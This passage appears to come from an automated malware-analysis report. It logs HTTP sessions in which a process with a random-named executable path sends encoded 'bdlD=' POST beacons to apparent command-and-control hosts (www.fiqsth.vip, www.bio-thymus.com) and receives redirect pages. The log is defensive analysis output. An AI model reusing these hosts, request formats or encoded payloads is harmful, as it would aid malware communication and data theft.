                                                                                                                                Nov 18, 2024 16:27:13.519999027 CET1214INData Raw: 2f 77 68 6f 69 73 2e 67 61 6e 64 69 2e 6e 65 74 2f 65 6e 2f 72 65 73 75 6c 74 73 3f 73 65 61 72 63 68 3d 61 73 74 6f 72 67 2d 67 72 6f 75 70 2e 69 6e 66 6f 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c
                                                                                                                                Data Ascii: /whois.gandi.net/en/results?search=astorg-group.info"><strong>View the WHOIS results of astorg-group.info</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Park


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                25192.168.2.6500123.33.130.190801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:27:18.693389893 CET631OUTPOST /0m8a/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 209
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.fiqsth.vip
                                                                                                                                Origin: http://www.fiqsth.vip
                                                                                                                                Referer: http://www.fiqsth.vip/0m8a/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 74 31 63 6e 54 5a 35 78 61 7a 34 5a 47 61 55 67 7a 4b 50 54 45 61 53 70 58 45 33 66 43 51 54 4a 78 68 62 67 31 46 6b 55 41 4c 4d 63 39 44 2f 34 4b 4b 74 7a 4c 76 71 6e 6d 35 5a 4e 55 50 35 38 61 6a 4e 4e 61 72 73 62 4b 36 51 42 2b 7a 6b 67 37 2f 31 70 76 34 7a 63 6b 2f 42 51 62 35 39 42 79 78 4e 50 79 37 51 63 66 33 70 76 4e 49 2f 54 5a 37 53 39 47 33 7a 51 47 49 54 45 33 4d 79 53 50 36 35 76 52 77 66 30 62 4b 38 62 35 56 66 48 2f 70 4a 2f 6c 74 61 49 6c 6f 4e 4b 58 5a 66 4e 59 68 73 37 75 49 39 31 6e 6b 30 59 33 4b 77 61 39 54 52 79 51 59 4a 48 6f 5a 6f 78 50 45 47 33 72 51 4a 67 58 52 76 47 61 4d 53 45
                                                                                                                                Data Ascii: bdlD=t1cnTZ5xaz4ZGaUgzKPTEaSpXE3fCQTJxhbg1FkUALMc9D/4KKtzLvqnm5ZNUP58ajNNarsbK6QB+zkg7/1pv4zck/BQb59ByxNPy7Qcf3pvNI/TZ7S9G3zQGITE3MySP65vRwf0bK8b5VfH/pJ/ltaIloNKXZfNYhs7uI91nk0Y3Kwa9TRyQYJHoZoxPEG3rQJgXRvGaMSE


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                26192.168.2.6500133.33.130.190801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:27:21.234764099 CET655OUTPOST /0m8a/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 233
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.fiqsth.vip
                                                                                                                                Origin: http://www.fiqsth.vip
                                                                                                                                Referer: http://www.fiqsth.vip/0m8a/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 74 31 63 6e 54 5a 35 78 61 7a 34 5a 48 36 45 67 2b 4a 6e 54 43 36 53 71 4a 30 33 66 4c 77 54 4e 78 68 58 67 31 45 67 45 41 5a 6f 63 2b 69 50 34 4a 4c 74 7a 4d 76 71 6e 2b 4a 5a 45 51 50 35 4e 61 6a 78 46 61 70 49 62 4b 36 45 42 2b 7a 30 67 34 49 68 71 75 6f 7a 61 76 66 42 6f 55 5a 39 42 79 78 4e 50 79 37 45 69 66 78 42 76 4e 38 37 54 66 76 47 2b 59 6e 7a 54 50 6f 54 45 7a 4d 79 57 50 36 35 42 52 30 2f 65 62 4d 34 62 35 55 76 48 2b 34 4a 2b 71 74 61 4f 34 34 4d 6c 45 4a 69 68 5a 53 64 76 6b 59 70 57 2b 48 73 69 37 63 74 41 68 67 52 52 43 49 70 46 6f 62 77 44 50 6b 47 64 70 51 78 67 46 47 6a 68 56 34 33 6e 6b 35 53 45 42 73 6e 43 66 77 52 36 62 42 41 78 5a 79 45 72 61 67 3d 3d
                                                                                                                                Data Ascii: bdlD=t1cnTZ5xaz4ZH6Eg+JnTC6SqJ03fLwTNxhXg1EgEAZoc+iP4JLtzMvqn+JZEQP5NajxFapIbK6EB+z0g4IhquozavfBoUZ9ByxNPy7EifxBvN87TfvG+YnzTPoTEzMyWP65BR0/ebM4b5UvH+4J+qtaO44MlEJihZSdvkYpW+Hsi7ctAhgRRCIpFobwDPkGdpQxgFGjhV43nk5SEBsnCfwR6bBAxZyErag==


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                27192.168.2.6500143.33.130.190801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:27:23.786346912 CET1668OUTPOST /0m8a/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 1245
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.fiqsth.vip
                                                                                                                                Origin: http://www.fiqsth.vip
                                                                                                                                Referer: http://www.fiqsth.vip/0m8a/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 74 31 63 6e 54 5a 35 78 61 7a 34 5a 48 36 45 67 2b 4a 6e 54 43 36 53 71 4a 30 33 66 4c 77 54 4e 78 68 58 67 31 45 67 45 41 5a 67 63 2b 56 6e 34 54 6f 46 7a 4e 76 71 6e 67 35 5a 4a 51 50 35 51 61 6e 64 42 61 70 31 35 4b 34 38 42 34 56 34 67 35 38 4e 71 6b 6f 7a 61 67 2f 42 54 62 35 39 75 79 78 64 4c 79 37 55 69 66 78 42 76 4e 36 58 54 4a 4c 53 2b 61 6e 7a 51 47 49 54 51 33 4d 79 79 50 36 78 33 52 30 36 72 62 38 59 62 2b 30 2f 48 79 71 78 2b 6a 74 61 4d 37 34 4d 39 45 4a 75 2b 5a 53 42 6a 6b 62 31 77 2b 46 77 69 2b 4a 38 48 38 6b 67 48 5a 35 4e 6e 6f 71 34 59 49 52 43 64 6d 78 6b 45 47 45 2f 58 66 74 53 50 6e 65 58 48 44 4f 75 48 53 68 56 76 62 56 70 59 55 47 5a 58 61 31 4e 69 37 35 47 55 6e 4c 45 50 67 49 41 4f 46 68 30 47 61 55 61 67 69 35 51 45 34 48 48 2f 6b 6f 2b 49 41 44 46 39 41 5a 55 64 6d 50 4f 46 70 77 71 62 42 64 37 46 50 32 6a 56 31 50 6c 50 67 7a 78 72 50 4e 42 44 51 50 39 6d 4a 58 35 44 71 33 42 54 7a 2f 79 47 4d 71 7a 48 6c 6a 68 51 79 46 67 74 48 79 6e 34 53 4b 2f 43 70 [TRUNCATED]
                                                                                                                                Data Ascii: bdlD=t1cnTZ5xaz4ZH6Eg+JnTC6SqJ03fLwTNxhXg1EgEAZgc+Vn4ToFzNvqng5ZJQP5QandBap15K48B4V4g58Nqkozag/BTb59uyxdLy7UifxBvN6XTJLS+anzQGITQ3MyyP6x3R06rb8Yb+0/Hyqx+jtaM74M9EJu+ZSBjkb1w+Fwi+J8H8kgHZ5Nnoq4YIRCdmxkEGE/XftSPneXHDOuHShVvbVpYUGZXa1Ni75GUnLEPgIAOFh0GaUagi5QE4HH/ko+IADF9AZUdmPOFpwqbBd7FP2jV1PlPgzxrPNBDQP9mJX5Dq3BTz/yGMqzHljhQyFgtHyn4SK/Cp8uAuGiRDJU9XpPE14SA5DYm9kwR3nRtBK6xwBqT9kjCEJLEPi4ytmEpDc8DVZEYLfH6RjOVA938Pg0Oa+TyP43XJBwswnwmirmTABI2E5i+Z1O800sdiPwC98RStKUFJYg7CttZl1ez5dhfTv/WoMFe5DQC2Ugu/gLZ8qmve4XxN7kiJsmBdcWqtD3YVbq8sXU0rv9xWNM8JeIJM/Xs/YbG3f6J6xcLDr4Wtyd89YgkPzmco9CNPR0ye0lhup2wwU1jt5VzWC7teLTI6zfMkD78y3+sD8ZYLU6i2ap6DgE3y1qMyEEBRq7WLcly4QkE+CZc6PxXvWo6Y7pcjizKOA0wa5bk3MyAcDixijX8cHOSx6n59Or3YbCNkmV7TzAEY9YW2E5cvvM61UjpUiAfTFXBC/p6dPD+V30Zqb2THsgE2HAmQCWcX2G6zVyfVaYRbua47mm+SAuPpVvm/3OTS7c/WOsQsd/QkHk+ppDQEwznJayzPZ7RoCZGjuaD834zDs2tit+697az2f9cCn9sLqZ25lp1uIMNfiYlN3qQ3YSpdHGMlgF7iLenKjCZQ1pUGEnIcqlrer6gBNCU+IU9slktORwysoFbXEWCrLfQCO8LBV+nwCEqqEOH9kad6+XMoSMl3/nM425EBgykjLwa7wo98VeRr+CneX8 [TRUNCATED]


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                28192.168.2.6500153.33.130.190801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:27:26.330338955 CET386OUTGET /0m8a/?bdlD=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAo/uZsaZcUpkXzlVN358Aa3h3Erj2PbCTGAasKcTxx+6hBqdfcgI=&92=DPyPNvf84fs0yXSp HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                Host: www.fiqsth.vip
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Nov 18, 2024 16:27:27.963671923 CET416INHTTP/1.1 200 OK
                                                                                                                                Server: openresty
                                                                                                                                Date: Mon, 18 Nov 2024 15:27:26 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 276
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 62 64 6c 44 3d 67 33 30 48 51 70 64 2b 48 67 4d 78 46 4f 73 76 79 34 66 42 44 34 65 50 44 47 2b 78 53 41 66 4c 6f 68 47 31 32 56 78 2b 57 4d 59 6a 2b 77 4b 41 52 4a 74 62 63 4f 43 77 6f 70 4e 77 41 74 74 79 4f 53 4e 33 58 36 6b 36 53 36 6f 44 32 7a 30 2b 2f 39 64 41 6f 2f 75 5a 73 61 5a 63 55 70 6b 58 7a 6c 56 4e 33 35 38 41 61 33 68 33 45 72 6a 32 50 62 43 54 47 41 61 73 4b 63 54 78 78 2b 36 68 42 71 64 66 63 67 49 3d 26 39 32 3d 44 50 79 50 4e 76 66 38 34 66 73 30 79 58 53 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?bdlD=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAo/uZsaZcUpkXzlVN358Aa3h3Erj2PbCTGAasKcTxx+6hBqdfcgI=&92=DPyPNvf84fs0yXSp"}</script></head></html>
                                                                                                                                Nov 18, 2024 16:27:27.964231968 CET416INHTTP/1.1 200 OK
                                                                                                                                Server: openresty
                                                                                                                                Date: Mon, 18 Nov 2024 15:27:26 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 276
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 62 64 6c 44 3d 67 33 30 48 51 70 64 2b 48 67 4d 78 46 4f 73 76 79 34 66 42 44 34 65 50 44 47 2b 78 53 41 66 4c 6f 68 47 31 32 56 78 2b 57 4d 59 6a 2b 77 4b 41 52 4a 74 62 63 4f 43 77 6f 70 4e 77 41 74 74 79 4f 53 4e 33 58 36 6b 36 53 36 6f 44 32 7a 30 2b 2f 39 64 41 6f 2f 75 5a 73 61 5a 63 55 70 6b 58 7a 6c 56 4e 33 35 38 41 61 33 68 33 45 72 6a 32 50 62 43 54 47 41 61 73 4b 63 54 78 78 2b 36 68 42 71 64 66 63 67 49 3d 26 39 32 3d 44 50 79 50 4e 76 66 38 34 66 73 30 79 58 53 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?bdlD=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAo/uZsaZcUpkXzlVN358Aa3h3Erj2PbCTGAasKcTxx+6hBqdfcgI=&92=DPyPNvf84fs0yXSp"}</script></head></html>
                                                                                                                                Nov 18, 2024 16:27:27.964639902 CET416INHTTP/1.1 200 OK
                                                                                                                                Server: openresty
                                                                                                                                Date: Mon, 18 Nov 2024 15:27:26 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 276
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 62 64 6c 44 3d 67 33 30 48 51 70 64 2b 48 67 4d 78 46 4f 73 76 79 34 66 42 44 34 65 50 44 47 2b 78 53 41 66 4c 6f 68 47 31 32 56 78 2b 57 4d 59 6a 2b 77 4b 41 52 4a 74 62 63 4f 43 77 6f 70 4e 77 41 74 74 79 4f 53 4e 33 58 36 6b 36 53 36 6f 44 32 7a 30 2b 2f 39 64 41 6f 2f 75 5a 73 61 5a 63 55 70 6b 58 7a 6c 56 4e 33 35 38 41 61 33 68 33 45 72 6a 32 50 62 43 54 47 41 61 73 4b 63 54 78 78 2b 36 68 42 71 64 66 63 67 49 3d 26 39 32 3d 44 50 79 50 4e 76 66 38 34 66 73 30 79 58 53 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?bdlD=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAo/uZsaZcUpkXzlVN358Aa3h3Erj2PbCTGAasKcTxx+6hBqdfcgI=&92=DPyPNvf84fs0yXSp"}</script></head></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                29192.168.2.6500163.33.130.190801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:27:33.021816015 CET643OUTPOST /ezyn/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 209
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.bio-thymus.com
                                                                                                                                Origin: http://www.bio-thymus.com
                                                                                                                                Referer: http://www.bio-thymus.com/ezyn/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 45 6e 59 54 4c 73 4d 56 6e 41 46 4c 78 61 65 4b 4f 5a 38 33 64 57 31 66 7a 39 35 5a 71 63 54 35 4a 68 5a 50 51 74 6f 35 62 59 34 62 31 39 4c 69 62 5a 44 43 32 59 2b 30 58 54 65 49 41 2f 2f 4f 61 30 46 49 30 69 66 35 39 69 68 33 47 7a 39 54 4b 66 41 73 4e 76 34 56 42 32 41 76 38 4a 4d 79 58 64 43 42 77 38 70 51 65 7a 56 2b 49 33 6e 51 57 6f 4e 79 62 53 34 2b 56 54 59 6f 55 68 75 37 69 4c 42 38 72 55 63 63 6d 69 76 41 7a 63 75 77 63 35 4c 45 7a 53 33 4d 52 58 57 79 77 55 42 39 39 2f 75 67 37 6f 62 72 51 4d 2f 68 7a 4a 49 6e 6e 46 72 65 6a 35 44 63 59 56 58 51 70 67 39 44 4b 39 2b 6d 69 6d 63 61 76 76 2f 6b
                                                                                                                                Data Ascii: bdlD=EnYTLsMVnAFLxaeKOZ83dW1fz95ZqcT5JhZPQto5bY4b19LibZDC2Y+0XTeIA//Oa0FI0if59ih3Gz9TKfAsNv4VB2Av8JMyXdCBw8pQezV+I3nQWoNybS4+VTYoUhu7iLB8rUccmivAzcuwc5LEzS3MRXWywUB99/ug7obrQM/hzJInnFrej5DcYVXQpg9DK9+mimcavv/k


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                30192.168.2.6500173.33.130.190801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:27:35.564790964 CET667OUTPOST /ezyn/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 233
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.bio-thymus.com
                                                                                                                                Origin: http://www.bio-thymus.com
                                                                                                                                Referer: http://www.bio-thymus.com/ezyn/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 45 6e 59 54 4c 73 4d 56 6e 41 46 4c 33 4b 75 4b 4a 2b 51 33 49 47 31 63 71 4e 35 5a 39 4d 54 39 4a 68 46 50 51 6f 51 50 62 72 63 62 79 63 37 69 61 63 76 43 31 59 2b 30 63 7a 65 4e 45 2f 2f 37 61 7a 4e 41 30 6a 6a 35 39 69 31 33 47 7a 74 54 4e 6f 63 6a 4e 2f 34 74 4a 57 41 58 79 70 4d 79 58 64 43 42 77 34 42 2b 65 31 39 2b 4c 47 58 51 57 4b 31 78 48 43 34 2f 42 44 59 6f 51 68 75 2f 69 4c 42 65 72 56 42 7a 6d 67 58 41 7a 5a 53 77 53 49 4c 48 36 53 32 4a 4a 33 58 77 31 78 63 46 37 75 7a 6d 34 5a 6a 32 41 65 48 34 32 2f 56 39 37 32 72 39 78 70 6a 65 59 58 50 69 70 41 39 70 49 39 47 6d 77 78 51 39 67 62 61 48 30 77 50 38 51 5a 56 62 2f 70 67 6d 71 79 5a 6c 72 69 43 4b 66 67 3d 3d
                                                                                                                                Data Ascii: bdlD=EnYTLsMVnAFL3KuKJ+Q3IG1cqN5Z9MT9JhFPQoQPbrcbyc7iacvC1Y+0czeNE//7azNA0jj59i13GztTNocjN/4tJWAXypMyXdCBw4B+e19+LGXQWK1xHC4/BDYoQhu/iLBerVBzmgXAzZSwSILH6S2JJ3Xw1xcF7uzm4Zj2AeH42/V972r9xpjeYXPipA9pI9GmwxQ9gbaH0wP8QZVb/pgmqyZlriCKfg==


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                31192.168.2.6500183.33.130.190801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:27:38.110781908 CET1680OUTPOST /ezyn/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 1245
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.bio-thymus.com
                                                                                                                                Origin: http://www.bio-thymus.com
                                                                                                                                Referer: http://www.bio-thymus.com/ezyn/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 45 6e 59 54 4c 73 4d 56 6e 41 46 4c 33 4b 75 4b 4a 2b 51 33 49 47 31 63 71 4e 35 5a 39 4d 54 39 4a 68 46 50 51 6f 51 50 62 72 55 62 79 75 7a 69 59 2f 58 43 30 59 2b 30 43 44 65 4d 45 2f 2f 63 61 79 70 45 30 6a 76 70 39 6e 78 33 48 56 68 54 49 64 6f 6a 47 2f 34 74 46 32 41 73 38 4a 4d 64 58 64 54 4b 77 38 6c 2b 65 31 39 2b 4c 45 50 51 66 34 4e 78 58 79 34 2b 56 54 59 6b 55 68 75 44 69 4c 59 70 72 56 46 5a 6e 55 72 41 30 39 4f 77 51 36 54 48 6d 43 32 4c 63 33 58 53 31 78 59 61 37 75 76 45 34 5a 48 51 41 65 7a 34 33 37 6b 44 2b 47 6d 6a 6c 65 66 49 4e 30 75 46 75 55 4e 31 48 76 65 4e 32 67 67 4f 6d 2f 71 79 30 55 2b 6c 63 49 64 63 39 62 59 38 75 46 6f 78 68 32 58 56 4e 2b 70 62 4a 49 52 4b 49 38 2b 45 67 33 6e 36 2b 69 44 68 33 36 6e 55 4d 2b 68 6e 71 45 77 42 4e 69 50 6c 64 59 56 45 52 79 49 57 46 32 36 4d 38 51 72 5a 77 71 64 4e 37 44 67 6e 4f 31 4c 4d 4e 42 6b 73 6f 55 4b 43 58 67 59 58 36 58 6a 43 64 4c 46 63 61 61 6d 6b 69 67 52 36 53 4f 6c 38 37 32 31 4f 59 74 79 50 57 77 62 79 69 [TRUNCATED]
                                                                                                                                Data Ascii: bdlD=EnYTLsMVnAFL3KuKJ+Q3IG1cqN5Z9MT9JhFPQoQPbrUbyuziY/XC0Y+0CDeME//caypE0jvp9nx3HVhTIdojG/4tF2As8JMdXdTKw8l+e19+LEPQf4NxXy4+VTYkUhuDiLYprVFZnUrA09OwQ6THmC2Lc3XS1xYa7uvE4ZHQAez437kD+GmjlefIN0uFuUN1HveN2ggOm/qy0U+lcIdc9bY8uFoxh2XVN+pbJIRKI8+Eg3n6+iDh36nUM+hnqEwBNiPldYVERyIWF26M8QrZwqdN7DgnO1LMNBksoUKCXgYX6XjCdLFcaamkigR6SOl8721OYtyPWwbyiAX7crfLJ9KIj7jB4pWZ9zQPknU45cOZbgAvhbjybUbPIHU55Sfq9q2T62oagJO4qmBpwHgv6pzBanxQ9DPSzlmZEiNEtAL/I4q6T7VlwJsAYvY9cdS2WFS48rMDEOnelAS/WCddmFbiMmUUUWYdrUe31XIXks2gOgV04LivDFe7f964sD6AduNHfrQ2pM64J4pDQ6T6ZLaGkS96ReEPqm4kr2HfI0pAYlxUMslON8CW+hCdE71BtrSBJB/H8XgPLxsU8CTSiSyOHar2aH5neZQqRWUyhKDHgGEBMTglnFriZGLcc+FrRsLoIpEBTCUcOYU+UAenX/8jHu2roYZxWzITUacbQ6UzM69IJ9/UDOOtGGG0xaga8/FhHj1tcuRcpSpZI66hTxQ5baHOC/7gvS6fbOzqBx19R7M6BhtFpln7ThUqWQSf5g4NkNj9oKzYcsLuEfw1OipIeF7NUwBFHPsxmI7dLddUtMlItL5+1cAn5l4m6Nn1qjdgEHsq84ImEoOp4LSGqkCgZVKV7V3rqVqol9FvIIHM5DYzRn/TmDJmymMZYMxVukNFHpJJUeAIU84I27usxetHthvIMtFoIwno/LsSE1zoSRBD7X5wM4OIkM6wTwrJK2QsT3q7vM5y8uiLFr0XXutAgUw6e4bWS0NfEQ72+NH895d [TRUNCATED]


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                32192.168.2.6500193.33.130.190801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:27:40.694086075 CET390OUTGET /ezyn/?bdlD=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMKKN8Ow4Y4PJmf6bny7d6dDdcL0boa7lHYjswT0s5aRSMl4VpoSs=&92=DPyPNvf84fs0yXSp HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                Host: www.bio-thymus.com
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Nov 18, 2024 16:27:41.341345072 CET416INHTTP/1.1 200 OK
                                                                                                                                Server: openresty
                                                                                                                                Date: Mon, 18 Nov 2024 15:27:41 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 276
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 62 64 6c 44 3d 4a 6c 77 7a 49 5a 77 49 31 78 4a 46 71 6f 75 54 41 71 51 69 47 69 35 46 6e 5a 4a 65 70 2f 44 41 51 51 74 49 66 2f 46 30 54 38 77 70 2f 2f 50 61 66 74 62 67 73 71 43 44 57 67 4b 79 51 62 2f 77 4e 33 6c 31 34 51 48 6d 35 53 39 44 47 54 73 78 45 64 45 4d 4b 4b 4e 38 4f 77 34 59 34 50 4a 6d 66 36 62 6e 79 37 64 36 64 44 64 63 4c 30 62 6f 61 37 6c 48 59 6a 73 77 54 30 73 35 61 52 53 4d 6c 34 56 70 6f 53 73 3d 26 39 32 3d 44 50 79 50 4e 76 66 38 34 66 73 30 79 58 53 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
